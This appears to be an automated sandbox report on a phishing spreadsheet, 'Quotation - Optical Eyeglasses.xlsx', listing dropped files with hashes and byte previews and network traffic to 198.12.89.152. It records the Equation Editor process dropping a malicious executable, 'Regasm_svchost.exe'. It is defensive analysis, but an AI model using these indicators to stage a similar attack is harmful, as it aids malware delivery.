SHA1:	A310025AAC3C93073F16BEF2056A5C398D9A41BA
SHA-256:	D5106547F8BF1B9CAB7C24DA1B648CAD51D96120B00B9AC07AF384FEB750D187
SHA-512:	30EEDD5DCB85B2FF225B165A9B915FA06B787A78BF28A54CB46A7684FE9D94D783E2FFBB800BAA64464FDD56A112F74FB91567F8AA65EC5B68C670289B932912
Malicious:	false
Preview:	.....H.....}........S........................}.H.......5.K...................-...................".....-...........................".....-...........I.B.......-...............$...........M...\|...................X.......................?...`.............}...r...g...\.".P.7.D.I.7.Z.+.i...u.......................................u...i.w.Z.j.I.].7.Q.".E...9.......#.............`...?.......................X...................\|...M...................`...2...................Y...1...................z...Z...;.........#.......9...E...Q...]...j.r.w.e...[...S...M...I...H...I...M...S...[...e...r.....+...7...D...P...\...g...r...}.;...Z...z...................1...Y...................2...`.................................-...............-.......-............z........-...........,...$.....M...Q...U...}.........2...............w.a...5...!...%.B...R.............%...M.....-...............-.......-............B........-...........$...$.........d...C..."......... .....d.!...&.../.../.S.X.?...N.............-.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D1391828.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 114 x 111, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	9007
Entropy (8bit):	7.965803762230949
Encrypted:	false
SSDEEP:	192:xDL+FFfJ6pI4ySj0Qxd2ZSgFGOkBeNn+SG7J2r1KCYZ19:xv+DfJ6K4BlX7I1+SQS7Yh
MD5:	A21ED528A4278D2D5C5518576B119CB1
SHA1:	581711E69D65B716A391510C48F77C420453ECBD
SHA-256:	81C1CD8E58D3B4F5EC76BFC6436EC2FDF1D3B5233AEC0CD6C6E5FE9B424C65C9
SHA-512:	3A360478C6532545062CB0C5E1E7F07CD040D67665248FF1BD253689B2D0C8EB8FA507471626674BBBD8227F98873FEA6A046382FBA7739E4D4286C42D938729
Malicious:	false
Preview:	.PNG........IHDR...r...o.....0..8....sRGB....... .IDATx^........t..3.......dy..7....5.DQDL4.hp.AE.Wp.z...Q.._4".......e..DA....f...U.LM.=./...s....k.....w.-.u]...{?.Z...{....7..W......E.>}.... [...M=5.1..]fcR....N.....c#.=9q............b....5u.)...M.Y.....%..^w=.......m...}....&8....~.....m.z...< ...7....1...o.!kj..j.X..{.....h.#....;P..o`..x.-..9W.. +...?e/.Cm.\|.7.jL..p]..:...n..j.o!1R.F.ad...c.C...f..MCL.V......hx4a.....@.[.D.S.?..E..:w...]..#..........cg..t..-./~Oq.."V.=...@.=EBo...w. .\|....JrE.~.K...%..As..0.w.c../`6#F.V.j...ea...z....2.0.A.a.....)0.O..:.tOl.P....8.q.&..:!.ir....4.@......D...hn..={.m[..8.....bi6@....W........[[...hH.8...%V.....k. ...!.].x.l0.q.Y...8...qa..v]..$\|..j~\|$.k.k.............>..@F.a..'QTS.#.E.........X...V...:...(..G\..`..5....[....p..R...h.......:4..u..5..&...A..q.u...cq..\S1P@....H.;....^}..c.-..'..D..=..t.Gs.u0..U...D.a...#.P(F.....W..x...k........Y..g....,;J..A.mB..k.sI.}QL...Rq.q.n.00...[....:......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F75A4C75.wmf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ms-windows metafont .wmf
Category:	dropped
Size (bytes):	13394
Entropy (8bit):	5.102000191951563
Encrypted:	false
SSDEEP:	384:57kA2HxAhR/SyE7lxN4JVNxqdNVrvDCkC90t272X3+WRB7uea1jiRs36tRFVJBeB:57kA2HxAhR/SyEZxN4JVNxqBrvDCd0tw
MD5:	35B6242416DED72F4D2D5BA2C5403DFC
SHA1:	D2D50B0D18F99ED5B23A5932B8321D0543F8A5C3
SHA-256:	93A6FC6436D546AF2B6C6215A5E9D3A227503AEFEE117371EEBFACD0E92FC9F5
SHA-512:	5E528B0274CE7F59D4E682FB2F98E4C3846AA831DCDC9ED8B5CC2FE3F250BF824E19B3E35CE70B24F91D9736FD9B1E882A4D0BD359B2DED30C661EACACD4D842
Malicious:	false
Preview:	...........r.......YT............4...........r.........1.....................-...................".....-...........................".....-.....................-...............$.........r...r...........................-.......-.......-............?........-...............$...4...4...E...0...4.......-...............-.......-...........-.........-...............$...A...0...E...A...A.......-...............-.......-............?........-...............$...I...g...r.r.p.r.T...d...I.......-...............-.......-............?........-...............$.....r.r.r.g...4.....I...........r.....-...............-.......-............?........-...............$...T...x.....I.d...T.......-...............-.......-............?........-...............$.........u.x...>.......`...........-...............-.......-...........-.........-...............$.........r...q.......r...r.........-...............-.......-...........-.........-...............$.........2.......q...q.............-...............-.......-.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FAC7EB4B.wmf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ms-windows metafont .wmf
Category:	dropped
Size (bytes):	5692
Entropy (8bit):	5.68725659600945
Encrypted:	false
SSDEEP:	96:qWx0ICjEkAs38UeWpOr6v1U/+nZyi2Wkv5i0x32+seq7BLImM6INLVCCT7l0eGY4:1xDmEkb8Umr6ve+nZb2f5i0x2+7q7dI8
MD5:	B33DD28C53DA7132F9C4687C8FF934AF
SHA1:	3762EDDF3184EB12CA65B35266FBEC29CA14DEAD
SHA-256:	1FA49081C44D54B1BE8A5D36C5C9271A7BC108F5141056723CF3EFEC4962D8BE
SHA-512:	7DB4EB02A988A223530B68A90524EB2C1AABBC3867EFC453476693D7B8562F598B31C5A10E8F3B7304FD278D6BBDFF3A569DBEA1B3B3B2E81A415FF1DA7165F5
Malicious:	false
Preview:	.....v. .).........PT..........................v.......J.....................-...................".....-...........................".....-....................-...............$.A.(.,.T....#.................=...\...x.....l...H..."...............y...M...!.................x.d.\.F.=.).....................T...(...................Y...5.....)...F...d...................!.x.M.v.y.x............."...H...l.............5...Y.............#....(.,...................-...............-.......-.....................-...............$.A.v.........{...q...b.E.P.i.:...!...................{...T. ..'...)...'... .{...Q...).....................i.j.E.T...B...3...)...".v. .J."...)...3...B...T...j.a...C...&.............)...Q...{..................T...{.........&...C...a.!...:...P...b...q...{.J...v.......-...............-.......-.....................-...............$.q...............................z...s...l...e...^...X...S...N...K...H...@...6...*.....4...L...a...v.................n...S...7.........P...P.s.;.v.(.

C:\Users\user\AppData\Local\Temp\~DF1E34B02C6542BFCB.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF2848124F9857A45C.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF411CBDC8CE3B6E4A.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	CDFV2 Encrypted
Category:	dropped
Size (bytes):	85592
Entropy (8bit):	7.9145684570229005
Encrypted:	false
SSDEEP:	1536:c62dy/S5YtRD+twDkrYP16e79WscmNeFtYbeq8nti5WKfVExbXB9o:c6syq5YtUtwkYP16eYscm6FqH/fV+BG
MD5:	936A314411E4A93F2DD6A01B51216EF3
SHA1:	47483467B595BDD9A49B577F457D84BCDB3B1C3B
SHA-256:	0897C1227E00E63196869DE72F0E4436E8493A7EE095BE94A914D4E547D6AC2E
SHA-512:	DE25F31575659555CF022CB28783B0FFA5681644B4C77E2ACB9FE5B9233C3F789F8B69BE54AF25F2E8995E1DE7328F7EB24B1ECE9174407934A710379E01425D
Malicious:	false
Preview:	......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\AppData\Local\Temp\~DF62A311AB9E677AE5.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$Quotation - Optical Eyeglasses.xlsx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\Regasm_svchost.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	896512
Entropy (8bit):	7.735833585263268
Encrypted:	false
SSDEEP:	12288:YZkGxgV2iNq+1MCVjjwDcYj5DHXYQn1qLbxhbJE3d7h4eAwRXIbUDbLDuXkjZc0I:KkGxgV10Ctw1jQ/xhbJEtOe9IbUDHDl
MD5:	A6439DBBF3F848EB6F83494C5C75A7A6
SHA1:	8381D3D1AC7CAA3BD8033F17B36C8D0ABE54480E
SHA-256:	1D806C678B4CC86F4BCB769B1D1E613D0AF28336DBAD4FACD0A04ED959D9EDBA
SHA-512:	AC573AEE0DC0C2C4E3439B6BC3AADCB244310E1713E2E27DA5B752DE6C2E93847002263B11B70D9CD8889D1E81CAA90DA53720909C789755702AF9D132173157
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............0.................. ........@.. ....................... ............@.....................................S.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......................(....!...........................................0..............0.............K...%.r...p.%.rK..p.%.rY..p.}......}.....(.... .m/. ..~fa%..^E........5.......d.......E...+b...(..... ~...Z .f.=a+..{.....(...... .,d.Z ..{a+... ..c.Z &.8Va+...{.....(..... ...zZ .77.a8u...~....t.....{....(....&.0..:........ ..h ...>a%..^E................+..(..... 6;..Z Qb..a+.....0..............0.................{....(.....(..... .... .rG.a%....^E................v...U.

Static File Info

General

File type:	CDFV2 Encrypted
Entropy (8bit):	7.9145684570229005
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	Quotation - Optical Eyeglasses.xlsx
File size:	85592
MD5:	936a314411e4a93f2dd6a01b51216ef3
SHA1:	47483467b595bdd9a49b577f457d84bcdb3b1c3b
SHA256:	0897c1227e00e63196869de72f0e4436e8493a7ee095be94a914d4e547d6ac2e
SHA512:	de25f31575659555cf022cb28783b0ffa5681644b4c77e2acb9fe5b9233c3f789f8b69be54af25f2e8995e1de7328f7eb24b1ece9174407934a710379e01425d
SSDEEP:	1536:c62dy/S5YtRD+twDkrYP16e79WscmNeFtYbeq8nti5WKfVExbXB9o:c6syq5YtUtwkYP16eYscm6FqH/fV+BG
TLSH:	5283E1A67393EB6FE2B307395667C59F8DA56C52FA10B1942D1CF9DC287B40C4B21311
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 8, 2022 17:26:50.680366039 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:50.795311928 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:50.795440912 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:50.796442986 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:50.915329933 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:50.915393114 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:50.915414095 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:50.915431976 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:50.915451050 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:50.915467024 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:50.915483952 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:50.915499926 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:50.915514946 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:50.915529966 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:50.915543079 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:50.915570021 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:50.915572882 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:50.915607929 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:50.926500082 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.030044079 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.030087948 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.030109882 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.030128956 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.030144930 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.030160904 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.030175924 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.030190945 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.030203104 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.030217886 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.030231953 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.030235052 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.030250072 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.030256987 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.030267000 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.030267954 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.030282974 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.030289888 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.030299902 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.030304909 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.030316114 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.030323982 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.030332088 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.030340910 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.030347109 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.030356884 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.030363083 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.030371904 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.030379057 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.030390024 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.030405045 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.030421019 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.031045914 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.144891024 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.144934893 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.144951105 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.144964933 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.144983053 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.144999027 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145015955 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145034075 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145050049 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145066023 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145081043 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145097017 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145112038 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145123959 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.145128965 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145143986 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145152092 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.145159960 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145170927 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.145176888 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145190001 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.145191908 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145207882 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145210028 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.145224094 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145229101 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.145239115 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145246029 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.145255089 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145263910 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.145270109 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145284891 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.145287037 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145303011 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145307064 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.145318031 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145329952 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.145334005 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145342112 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.145350933 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145359039 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.145365953 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145376921 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.145382881 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145394087 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.145401001 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145411015 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.145416975 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145432949 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145433903 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.145447969 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145452023 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.145463943 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145468950 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.145479918 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145484924 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.145494938 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145502090 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.145512104 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145519018 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.145528078 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145534992 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.145545006 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.145551920 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.145567894 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.145584106 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.146225929 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260077953 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260130882 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260148048 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260164976 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260181904 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260196924 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260212898 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260227919 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260243893 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260243893 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260260105 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260271072 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260273933 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260278940 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260287046 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260298014 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260302067 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260317087 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260318041 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260332108 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260334015 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260349989 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260351896 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260370970 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260385990 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260476112 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260493040 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260508060 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260519981 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260524035 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260540009 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260540962 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260555983 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260557890 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260571957 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260574102 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260587931 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260591984 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260603905 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260607958 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260620117 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260629892 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260634899 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260641098 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260652065 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260658026 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260668039 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260675907 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260684013 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260690928 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260701895 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260706902 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260716915 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260724068 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260734081 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260740995 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260750055 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260756969 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260766029 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260773897 CEST	49179	80	192.168.2.22	198.12.89.152
